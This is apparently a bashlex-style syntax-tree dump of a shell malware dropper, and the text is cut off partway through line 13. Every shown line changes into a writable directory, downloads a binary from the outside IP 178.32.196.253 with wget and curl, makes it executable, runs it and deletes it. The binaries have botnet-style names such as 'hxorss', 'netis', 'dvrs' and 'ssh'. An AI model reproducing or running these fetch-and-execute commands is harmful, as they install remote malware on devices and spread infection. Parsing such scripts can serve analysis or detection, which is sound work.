ListNode(lineno=2, pos=(12, 175), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://178.32.196.253/Flses'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 136), parts=[
    WordNode(lineno=2, pos=(101, 105), word='curl'),
    WordNode(lineno=2, pos=(106, 108), word='-O'),
    WordNode(lineno=2, pos=(109, 136), word='http://178.32.196.253/Flses'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(136, 137)),
  CommandNode(lineno=2, pos=(138, 152), parts=[
    WordNode(lineno=2, pos=(138, 143), word='chmod'),
    WordNode(lineno=2, pos=(144, 146), word='+x'),
    WordNode(lineno=2, pos=(147, 152), word='Flses'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(152, 153)),
  CommandNode(lineno=2, pos=(154, 161), parts=[
    WordNode(lineno=2, pos=(154, 161), word='./Flses'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(161, 162)),
  CommandNode(lineno=2, pos=(163, 175), parts=[
    WordNode(lineno=2, pos=(163, 165), word='rm'),
    WordNode(lineno=2, pos=(166, 169), word='-rf'),
    WordNode(lineno=2, pos=(170, 175), word='Flses'),
  ]),
])
ListNode(lineno=3, pos=(176, 334), parts=[
  CommandNode(lineno=3, pos=(176, 183), parts=[
    WordNode(lineno=3, pos=(176, 178), word='cd'),
    WordNode(lineno=3, pos=(179, 183), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(184, 186)),
  CommandNode(lineno=3, pos=(187, 198), parts=[
    WordNode(lineno=3, pos=(187, 189), word='cd'),
    WordNode(lineno=3, pos=(190, 198), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(199, 201)),
  CommandNode(lineno=3, pos=(202, 209), parts=[
    WordNode(lineno=3, pos=(202, 204), word='cd'),
    WordNode(lineno=3, pos=(205, 209), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(210, 212)),
  CommandNode(lineno=3, pos=(213, 221), parts=[
    WordNode(lineno=3, pos=(213, 215), word='cd'),
    WordNode(lineno=3, pos=(216, 221), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(222, 224)),
  CommandNode(lineno=3, pos=(225, 229), parts=[
    WordNode(lineno=3, pos=(225, 227), word='cd'),
    WordNode(lineno=3, pos=(228, 229), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(229, 230)),
  CommandNode(lineno=3, pos=(231, 262), parts=[
    WordNode(lineno=3, pos=(231, 235), word='wget'),
    WordNode(lineno=3, pos=(236, 262), word='http://178.32.196.253/7331'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(262, 263)),
  CommandNode(lineno=3, pos=(264, 298), parts=[
    WordNode(lineno=3, pos=(264, 268), word='curl'),
    WordNode(lineno=3, pos=(269, 271), word='-O'),
    WordNode(lineno=3, pos=(272, 298), word='http://178.32.196.253/7331'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(298, 299)),
  CommandNode(lineno=3, pos=(300, 313), parts=[
    WordNode(lineno=3, pos=(300, 305), word='chmod'),
    WordNode(lineno=3, pos=(306, 308), word='+x'),
    WordNode(lineno=3, pos=(309, 313), word='7331'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(313, 314)),
  CommandNode(lineno=3, pos=(315, 321), parts=[
    WordNode(lineno=3, pos=(315, 321), word='./7331'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(321, 322)),
  CommandNode(lineno=3, pos=(323, 334), parts=[
    WordNode(lineno=3, pos=(323, 325), word='rm'),
    WordNode(lineno=3, pos=(326, 329), word='-rf'),
    WordNode(lineno=3, pos=(330, 334), word='7331'),
  ]),
])
ListNode(lineno=4, pos=(335, 503), parts=[
  CommandNode(lineno=4, pos=(335, 342), parts=[
    WordNode(lineno=4, pos=(335, 337), word='cd'),
    WordNode(lineno=4, pos=(338, 342), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(343, 345)),
  CommandNode(lineno=4, pos=(346, 357), parts=[
    WordNode(lineno=4, pos=(346, 348), word='cd'),
    WordNode(lineno=4, pos=(349, 357), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(358, 360)),
  CommandNode(lineno=4, pos=(361, 368), parts=[
    WordNode(lineno=4, pos=(361, 363), word='cd'),
    WordNode(lineno=4, pos=(364, 368), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(369, 371)),
  CommandNode(lineno=4, pos=(372, 380), parts=[
    WordNode(lineno=4, pos=(372, 374), word='cd'),
    WordNode(lineno=4, pos=(375, 380), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(381, 383)),
  CommandNode(lineno=4, pos=(384, 388), parts=[
    WordNode(lineno=4, pos=(384, 386), word='cd'),
    WordNode(lineno=4, pos=(387, 388), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(388, 389)),
  CommandNode(lineno=4, pos=(390, 423), parts=[
    WordNode(lineno=4, pos=(390, 394), word='wget'),
    WordNode(lineno=4, pos=(395, 423), word='http://178.32.196.253/hxorss'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(423, 424)),
  CommandNode(lineno=4, pos=(425, 461), parts=[
    WordNode(lineno=4, pos=(425, 429), word='curl'),
    WordNode(lineno=4, pos=(430, 432), word='-O'),
    WordNode(lineno=4, pos=(433, 461), word='http://178.32.196.253/hxorss'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(461, 462)),
  CommandNode(lineno=4, pos=(463, 478), parts=[
    WordNode(lineno=4, pos=(463, 468), word='chmod'),
    WordNode(lineno=4, pos=(469, 471), word='+x'),
    WordNode(lineno=4, pos=(472, 478), word='hxorss'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(478, 479)),
  CommandNode(lineno=4, pos=(480, 488), parts=[
    WordNode(lineno=4, pos=(480, 488), word='./hxorss'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(488, 489)),
  CommandNode(lineno=4, pos=(490, 503), parts=[
    WordNode(lineno=4, pos=(490, 492), word='rm'),
    WordNode(lineno=4, pos=(493, 496), word='-rf'),
    WordNode(lineno=4, pos=(497, 503), word='hxorss'),
  ]),
])
ListNode(lineno=5, pos=(504, 672), parts=[
  CommandNode(lineno=5, pos=(504, 511), parts=[
    WordNode(lineno=5, pos=(504, 506), word='cd'),
    WordNode(lineno=5, pos=(507, 511), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(512, 514)),
  CommandNode(lineno=5, pos=(515, 526), parts=[
    WordNode(lineno=5, pos=(515, 517), word='cd'),
    WordNode(lineno=5, pos=(518, 526), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(527, 529)),
  CommandNode(lineno=5, pos=(530, 537), parts=[
    WordNode(lineno=5, pos=(530, 532), word='cd'),
    WordNode(lineno=5, pos=(533, 537), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(538, 540)),
  CommandNode(lineno=5, pos=(541, 549), parts=[
    WordNode(lineno=5, pos=(541, 543), word='cd'),
    WordNode(lineno=5, pos=(544, 549), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(550, 552)),
  CommandNode(lineno=5, pos=(553, 557), parts=[
    WordNode(lineno=5, pos=(553, 555), word='cd'),
    WordNode(lineno=5, pos=(556, 557), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(557, 558)),
  CommandNode(lineno=5, pos=(559, 592), parts=[
    WordNode(lineno=5, pos=(559, 563), word='wget'),
    WordNode(lineno=5, pos=(564, 592), word='http://178.32.196.253/ifican'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(592, 593)),
  CommandNode(lineno=5, pos=(594, 630), parts=[
    WordNode(lineno=5, pos=(594, 598), word='curl'),
    WordNode(lineno=5, pos=(599, 601), word='-O'),
    WordNode(lineno=5, pos=(602, 630), word='http://178.32.196.253/ifican'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(630, 631)),
  CommandNode(lineno=5, pos=(632, 647), parts=[
    WordNode(lineno=5, pos=(632, 637), word='chmod'),
    WordNode(lineno=5, pos=(638, 640), word='+x'),
    WordNode(lineno=5, pos=(641, 647), word='ifican'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(647, 648)),
  CommandNode(lineno=5, pos=(649, 657), parts=[
    WordNode(lineno=5, pos=(649, 657), word='./ifican'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(657, 658)),
  CommandNode(lineno=5, pos=(659, 672), parts=[
    WordNode(lineno=5, pos=(659, 661), word='rm'),
    WordNode(lineno=5, pos=(662, 665), word='-rf'),
    WordNode(lineno=5, pos=(666, 672), word='ifican'),
  ]),
])
ListNode(lineno=6, pos=(673, 831), parts=[
  CommandNode(lineno=6, pos=(673, 680), parts=[
    WordNode(lineno=6, pos=(673, 675), word='cd'),
    WordNode(lineno=6, pos=(676, 680), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(681, 683)),
  CommandNode(lineno=6, pos=(684, 695), parts=[
    WordNode(lineno=6, pos=(684, 686), word='cd'),
    WordNode(lineno=6, pos=(687, 695), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(696, 698)),
  CommandNode(lineno=6, pos=(699, 706), parts=[
    WordNode(lineno=6, pos=(699, 701), word='cd'),
    WordNode(lineno=6, pos=(702, 706), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(707, 709)),
  CommandNode(lineno=6, pos=(710, 718), parts=[
    WordNode(lineno=6, pos=(710, 712), word='cd'),
    WordNode(lineno=6, pos=(713, 718), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(719, 721)),
  CommandNode(lineno=6, pos=(722, 726), parts=[
    WordNode(lineno=6, pos=(722, 724), word='cd'),
    WordNode(lineno=6, pos=(725, 726), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(726, 727)),
  CommandNode(lineno=6, pos=(728, 759), parts=[
    WordNode(lineno=6, pos=(728, 732), word='wget'),
    WordNode(lineno=6, pos=(733, 759), word='http://178.32.196.253/else'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(759, 760)),
  CommandNode(lineno=6, pos=(761, 795), parts=[
    WordNode(lineno=6, pos=(761, 765), word='curl'),
    WordNode(lineno=6, pos=(766, 768), word='-O'),
    WordNode(lineno=6, pos=(769, 795), word='http://178.32.196.253/else'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(795, 796)),
  CommandNode(lineno=6, pos=(797, 810), parts=[
    WordNode(lineno=6, pos=(797, 802), word='chmod'),
    WordNode(lineno=6, pos=(803, 805), word='+x'),
    WordNode(lineno=6, pos=(806, 810), word='else'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(810, 811)),
  CommandNode(lineno=6, pos=(812, 818), parts=[
    WordNode(lineno=6, pos=(812, 818), word='./else'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(818, 819)),
  CommandNode(lineno=6, pos=(820, 831), parts=[
    WordNode(lineno=6, pos=(820, 822), word='rm'),
    WordNode(lineno=6, pos=(823, 826), word='-rf'),
    WordNode(lineno=6, pos=(827, 831), word='else'),
  ]),
])
ListNode(lineno=7, pos=(832, 990), parts=[
  CommandNode(lineno=7, pos=(832, 839), parts=[
    WordNode(lineno=7, pos=(832, 834), word='cd'),
    WordNode(lineno=7, pos=(835, 839), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(840, 842)),
  CommandNode(lineno=7, pos=(843, 854), parts=[
    WordNode(lineno=7, pos=(843, 845), word='cd'),
    WordNode(lineno=7, pos=(846, 854), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(855, 857)),
  CommandNode(lineno=7, pos=(858, 865), parts=[
    WordNode(lineno=7, pos=(858, 860), word='cd'),
    WordNode(lineno=7, pos=(861, 865), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(866, 868)),
  CommandNode(lineno=7, pos=(869, 877), parts=[
    WordNode(lineno=7, pos=(869, 871), word='cd'),
    WordNode(lineno=7, pos=(872, 877), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(878, 880)),
  CommandNode(lineno=7, pos=(881, 885), parts=[
    WordNode(lineno=7, pos=(881, 883), word='cd'),
    WordNode(lineno=7, pos=(884, 885), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(885, 886)),
  CommandNode(lineno=7, pos=(887, 918), parts=[
    WordNode(lineno=7, pos=(887, 891), word='wget'),
    WordNode(lineno=7, pos=(892, 918), word='http://178.32.196.253/dvrs'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(918, 919)),
  CommandNode(lineno=7, pos=(920, 954), parts=[
    WordNode(lineno=7, pos=(920, 924), word='curl'),
    WordNode(lineno=7, pos=(925, 927), word='-O'),
    WordNode(lineno=7, pos=(928, 954), word='http://178.32.196.253/dvrs'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(954, 955)),
  CommandNode(lineno=7, pos=(956, 969), parts=[
    WordNode(lineno=7, pos=(956, 961), word='chmod'),
    WordNode(lineno=7, pos=(962, 964), word='+x'),
    WordNode(lineno=7, pos=(965, 969), word='dvrs'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(969, 970)),
  CommandNode(lineno=7, pos=(971, 977), parts=[
    WordNode(lineno=7, pos=(971, 977), word='./dvrs'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(977, 978)),
  CommandNode(lineno=7, pos=(979, 990), parts=[
    WordNode(lineno=7, pos=(979, 981), word='rm'),
    WordNode(lineno=7, pos=(982, 985), word='-rf'),
    WordNode(lineno=7, pos=(986, 990), word='dvrs'),
  ]),
])
ListNode(lineno=8, pos=(991, 1159), parts=[
  CommandNode(lineno=8, pos=(991, 998), parts=[
    WordNode(lineno=8, pos=(991, 993), word='cd'),
    WordNode(lineno=8, pos=(994, 998), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(999, 1001)),
  CommandNode(lineno=8, pos=(1002, 1013), parts=[
    WordNode(lineno=8, pos=(1002, 1004), word='cd'),
    WordNode(lineno=8, pos=(1005, 1013), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1014, 1016)),
  CommandNode(lineno=8, pos=(1017, 1024), parts=[
    WordNode(lineno=8, pos=(1017, 1019), word='cd'),
    WordNode(lineno=8, pos=(1020, 1024), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1025, 1027)),
  CommandNode(lineno=8, pos=(1028, 1036), parts=[
    WordNode(lineno=8, pos=(1028, 1030), word='cd'),
    WordNode(lineno=8, pos=(1031, 1036), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1037, 1039)),
  CommandNode(lineno=8, pos=(1040, 1044), parts=[
    WordNode(lineno=8, pos=(1040, 1042), word='cd'),
    WordNode(lineno=8, pos=(1043, 1044), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1044, 1045)),
  CommandNode(lineno=8, pos=(1046, 1079), parts=[
    WordNode(lineno=8, pos=(1046, 1050), word='wget'),
    WordNode(lineno=8, pos=(1051, 1079), word='http://178.32.196.253/phones'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1079, 1080)),
  CommandNode(lineno=8, pos=(1081, 1117), parts=[
    WordNode(lineno=8, pos=(1081, 1085), word='curl'),
    WordNode(lineno=8, pos=(1086, 1088), word='-O'),
    WordNode(lineno=8, pos=(1089, 1117), word='http://178.32.196.253/phones'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1117, 1118)),
  CommandNode(lineno=8, pos=(1119, 1134), parts=[
    WordNode(lineno=8, pos=(1119, 1124), word='chmod'),
    WordNode(lineno=8, pos=(1125, 1127), word='+x'),
    WordNode(lineno=8, pos=(1128, 1134), word='phones'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1134, 1135)),
  CommandNode(lineno=8, pos=(1136, 1144), parts=[
    WordNode(lineno=8, pos=(1136, 1144), word='./phones'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1144, 1145)),
  CommandNode(lineno=8, pos=(1146, 1159), parts=[
    WordNode(lineno=8, pos=(1146, 1148), word='rm'),
    WordNode(lineno=8, pos=(1149, 1152), word='-rf'),
    WordNode(lineno=8, pos=(1153, 1159), word='phones'),
  ]),
])
ListNode(lineno=9, pos=(1160, 1323), parts=[
  CommandNode(lineno=9, pos=(1160, 1167), parts=[
    WordNode(lineno=9, pos=(1160, 1162), word='cd'),
    WordNode(lineno=9, pos=(1163, 1167), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1168, 1170)),
  CommandNode(lineno=9, pos=(1171, 1182), parts=[
    WordNode(lineno=9, pos=(1171, 1173), word='cd'),
    WordNode(lineno=9, pos=(1174, 1182), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1183, 1185)),
  CommandNode(lineno=9, pos=(1186, 1193), parts=[
    WordNode(lineno=9, pos=(1186, 1188), word='cd'),
    WordNode(lineno=9, pos=(1189, 1193), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1194, 1196)),
  CommandNode(lineno=9, pos=(1197, 1205), parts=[
    WordNode(lineno=9, pos=(1197, 1199), word='cd'),
    WordNode(lineno=9, pos=(1200, 1205), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1206, 1208)),
  CommandNode(lineno=9, pos=(1209, 1213), parts=[
    WordNode(lineno=9, pos=(1209, 1211), word='cd'),
    WordNode(lineno=9, pos=(1212, 1213), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1213, 1214)),
  CommandNode(lineno=9, pos=(1215, 1247), parts=[
    WordNode(lineno=9, pos=(1215, 1219), word='wget'),
    WordNode(lineno=9, pos=(1220, 1247), word='http://178.32.196.253/netis'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1247, 1248)),
  CommandNode(lineno=9, pos=(1249, 1284), parts=[
    WordNode(lineno=9, pos=(1249, 1253), word='curl'),
    WordNode(lineno=9, pos=(1254, 1256), word='-O'),
    WordNode(lineno=9, pos=(1257, 1284), word='http://178.32.196.253/netis'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1284, 1285)),
  CommandNode(lineno=9, pos=(1286, 1300), parts=[
    WordNode(lineno=9, pos=(1286, 1291), word='chmod'),
    WordNode(lineno=9, pos=(1292, 1294), word='+x'),
    WordNode(lineno=9, pos=(1295, 1300), word='netis'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1300, 1301)),
  CommandNode(lineno=9, pos=(1302, 1309), parts=[
    WordNode(lineno=9, pos=(1302, 1309), word='./netis'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1309, 1310)),
  CommandNode(lineno=9, pos=(1311, 1323), parts=[
    WordNode(lineno=9, pos=(1311, 1313), word='rm'),
    WordNode(lineno=9, pos=(1314, 1317), word='-rf'),
    WordNode(lineno=9, pos=(1318, 1323), word='netis'),
  ]),
])
ListNode(lineno=10, pos=(1324, 1477), parts=[
  CommandNode(lineno=10, pos=(1324, 1331), parts=[
    WordNode(lineno=10, pos=(1324, 1326), word='cd'),
    WordNode(lineno=10, pos=(1327, 1331), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1332, 1334)),
  CommandNode(lineno=10, pos=(1335, 1346), parts=[
    WordNode(lineno=10, pos=(1335, 1337), word='cd'),
    WordNode(lineno=10, pos=(1338, 1346), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1347, 1349)),
  CommandNode(lineno=10, pos=(1350, 1357), parts=[
    WordNode(lineno=10, pos=(1350, 1352), word='cd'),
    WordNode(lineno=10, pos=(1353, 1357), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1358, 1360)),
  CommandNode(lineno=10, pos=(1361, 1369), parts=[
    WordNode(lineno=10, pos=(1361, 1363), word='cd'),
    WordNode(lineno=10, pos=(1364, 1369), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1370, 1372)),
  CommandNode(lineno=10, pos=(1373, 1377), parts=[
    WordNode(lineno=10, pos=(1373, 1375), word='cd'),
    WordNode(lineno=10, pos=(1376, 1377), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1377, 1378)),
  CommandNode(lineno=10, pos=(1379, 1409), parts=[
    WordNode(lineno=10, pos=(1379, 1383), word='wget'),
    WordNode(lineno=10, pos=(1384, 1409), word='http://178.32.196.253/ssh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1409, 1410)),
  CommandNode(lineno=10, pos=(1411, 1444), parts=[
    WordNode(lineno=10, pos=(1411, 1415), word='curl'),
    WordNode(lineno=10, pos=(1416, 1418), word='-O'),
    WordNode(lineno=10, pos=(1419, 1444), word='http://178.32.196.253/ssh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1444, 1445)),
  CommandNode(lineno=10, pos=(1446, 1458), parts=[
    WordNode(lineno=10, pos=(1446, 1451), word='chmod'),
    WordNode(lineno=10, pos=(1452, 1454), word='+x'),
    WordNode(lineno=10, pos=(1455, 1458), word='ssh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1458, 1459)),
  CommandNode(lineno=10, pos=(1460, 1465), parts=[
    WordNode(lineno=10, pos=(1460, 1465), word='./ssh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1465, 1466)),
  CommandNode(lineno=10, pos=(1467, 1477), parts=[
    WordNode(lineno=10, pos=(1467, 1469), word='rm'),
    WordNode(lineno=10, pos=(1470, 1473), word='-rf'),
    WordNode(lineno=10, pos=(1474, 1477), word='ssh'),
  ]),
])
ListNode(lineno=11, pos=(1478, 1631), parts=[
  CommandNode(lineno=11, pos=(1478, 1485), parts=[
    WordNode(lineno=11, pos=(1478, 1480), word='cd'),
    WordNode(lineno=11, pos=(1481, 1485), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1486, 1488)),
  CommandNode(lineno=11, pos=(1489, 1500), parts=[
    WordNode(lineno=11, pos=(1489, 1491), word='cd'),
    WordNode(lineno=11, pos=(1492, 1500), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1501, 1503)),
  CommandNode(lineno=11, pos=(1504, 1511), parts=[
    WordNode(lineno=11, pos=(1504, 1506), word='cd'),
    WordNode(lineno=11, pos=(1507, 1511), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1512, 1514)),
  CommandNode(lineno=11, pos=(1515, 1523), parts=[
    WordNode(lineno=11, pos=(1515, 1517), word='cd'),
    WordNode(lineno=11, pos=(1518, 1523), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1524, 1526)),
  CommandNode(lineno=11, pos=(1527, 1531), parts=[
    WordNode(lineno=11, pos=(1527, 1529), word='cd'),
    WordNode(lineno=11, pos=(1530, 1531), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1531, 1532)),
  CommandNode(lineno=11, pos=(1533, 1563), parts=[
    WordNode(lineno=11, pos=(1533, 1537), word='wget'),
    WordNode(lineno=11, pos=(1538, 1563), word='http://178.32.196.253/huh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1563, 1564)),
  CommandNode(lineno=11, pos=(1565, 1598), parts=[
    WordNode(lineno=11, pos=(1565, 1569), word='curl'),
    WordNode(lineno=11, pos=(1570, 1572), word='-O'),
    WordNode(lineno=11, pos=(1573, 1598), word='http://178.32.196.253/huh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1598, 1599)),
  CommandNode(lineno=11, pos=(1600, 1612), parts=[
    WordNode(lineno=11, pos=(1600, 1605), word='chmod'),
    WordNode(lineno=11, pos=(1606, 1608), word='+x'),
    WordNode(lineno=11, pos=(1609, 1612), word='huh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1612, 1613)),
  CommandNode(lineno=11, pos=(1614, 1619), parts=[
    WordNode(lineno=11, pos=(1614, 1619), word='./huh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1619, 1620)),
  CommandNode(lineno=11, pos=(1621, 1631), parts=[
    WordNode(lineno=11, pos=(1621, 1623), word='rm'),
    WordNode(lineno=11, pos=(1624, 1627), word='-rf'),
    WordNode(lineno=11, pos=(1628, 1631), word='huh'),
  ]),
])
ListNode(lineno=12, pos=(1632, 1795), parts=[
  CommandNode(lineno=12, pos=(1632, 1639), parts=[
    WordNode(lineno=12, pos=(1632, 1634), word='cd'),
    WordNode(lineno=12, pos=(1635, 1639), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1640, 1642)),
  CommandNode(lineno=12, pos=(1643, 1654), parts=[
    WordNode(lineno=12, pos=(1643, 1645), word='cd'),
    WordNode(lineno=12, pos=(1646, 1654), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1655, 1657)),
  CommandNode(lineno=12, pos=(1658, 1665), parts=[
    WordNode(lineno=12, pos=(1658, 1660), word='cd'),
    WordNode(lineno=12, pos=(1661, 1665), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1666, 1668)),
  CommandNode(lineno=12, pos=(1669, 1677), parts=[
    WordNode(lineno=12, pos=(1669, 1671), word='cd'),
    WordNode(lineno=12, pos=(1672, 1677), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1678, 1680)),
  CommandNode(lineno=12, pos=(1681, 1685), parts=[
    WordNode(lineno=12, pos=(1681, 1683), word='cd'),
    WordNode(lineno=12, pos=(1684, 1685), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1685, 1686)),
  CommandNode(lineno=12, pos=(1687, 1719), parts=[
    WordNode(lineno=12, pos=(1687, 1691), word='wget'),
    WordNode(lineno=12, pos=(1692, 1719), word='http://178.32.196.253/noice'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1719, 1720)),
  CommandNode(lineno=12, pos=(1721, 1756), parts=[
    WordNode(lineno=12, pos=(1721, 1725), word='curl'),
    WordNode(lineno=12, pos=(1726, 1728), word='-O'),
    WordNode(lineno=12, pos=(1729, 1756), word='http://178.32.196.253/noice'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1756, 1757)),
  CommandNode(lineno=12, pos=(1758, 1772), parts=[
    WordNode(lineno=12, pos=(1758, 1763), word='chmod'),
    WordNode(lineno=12, pos=(1764, 1766), word='+x'),
    WordNode(lineno=12, pos=(1767, 1772), word='noice'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1772, 1773)),
  CommandNode(lineno=12, pos=(1774, 1781), parts=[
    WordNode(lineno=12, pos=(1774, 1781), word='./noice'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1781, 1782)),
  CommandNode(lineno=12, pos=(1783, 1795), parts=[
    WordNode(lineno=12, pos=(1783, 1785), word='rm'),
    WordNode(lineno=12, pos=(1786, 1789), word='-rf'),
    WordNode(lineno=12, pos=(1790, 1795), word='noice'),
  ]),
])
ListNode(lineno=13, pos=(1796, 1954), parts=[
  CommandNode(lineno=13, pos=(1796, 1803), parts=[
    WordNode(lineno=13, pos=(1796, 1798), word='cd'),
    WordNode(lineno=13, pos=(1799, 1803), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1804, 1806)),
  CommandNode(lineno=13, pos=(1807, 1818), parts=[
    WordNode(lineno=13, pos=(1807, 1809), word='cd'),
    WordNode(lineno=13, pos=(1810, 1818), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1819, 1821)),
  CommandNode(lineno=13, pos=(1822, 1829), parts=[
    WordNode(lineno=13, pos=(1822, 1824), word='cd'),
    WordNode(lineno=13, pos=(1825, 1829), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1830, 1832)),
  CommandNode(lineno=13, pos=(1833, 1841), parts=[
    WordNode(lineno=13, pos=(1833, 1835), word='cd'),
    WordNode(lineno=13, pos=(1836, 1841), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1842, 1844)),
  CommandNode(lineno=13, pos=(1845, 1849), parts=[
    WordNode(lineno=13, pos=(1845, 1847), word='cd'),
    WordNode(lineno=13, pos=(1848, 1849), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1849, 1850)),
  CommandNode(lineno=13, pos=(1851, 1882), parts=[
    WordNode(lineno=13, pos=(1851, 1855), word='wget'),
    WordNode(lineno=13, pos=(1856, 1882), word='http://178.32.196.253/mate'),
  ]),
